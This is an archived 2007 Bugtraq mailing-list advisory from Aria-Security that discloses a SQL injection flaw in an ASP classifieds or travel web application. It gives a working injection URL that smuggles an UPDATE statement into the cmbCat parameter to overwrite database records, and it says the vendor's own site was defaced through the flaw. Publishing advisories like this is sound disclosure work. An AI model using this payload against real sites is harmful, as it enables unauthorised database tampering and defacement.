Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq: Aria-Security.Net Research: Request For Travel Sql Injection

Aria-Security.Net Research: Request For Travel Sql Injection

From: <Advisory_at_aria-security.net>
Date: 8 Nov 2007 02:31:52 -0000

('binary' encoding is not supported, stored as-is) Aria-Security Team,
http://Aria-Security.net
-------------------------------
Rapid Classfield SQL Injection
Shout Outs: AurA, imm02tal
Vendor: http://www.lotfian.com/UK/PORTALS.asp

http://target/agencyCatResult.asp?cmbCat='%20UPDATE%20rftCategory%20set%20Category%20=%20'Aria-Security Team';--

The Vendor's website has been attacked by Emperor Team via this vuln.

Regards,
The-0utl4w
>From Aria-Security.Net
Received on Nov 08 2007

This message: [ Message body ]
Next message: h3llcode_at_hotmail.it: "Simple Machine Forum - Private section/posts/info disclosure"
Previous message: buzzy_at_poczta.fm: "Re: iDefense Security Advisory 11.07.07: Oracle 10g R2 PITRIG_DROPMETADATA Buffer Overflow Vulnerability"

Contemporary messages sorted: [ by date ] [ by thread ] [ by subject ] [ by author ] [ by messages with attachments ]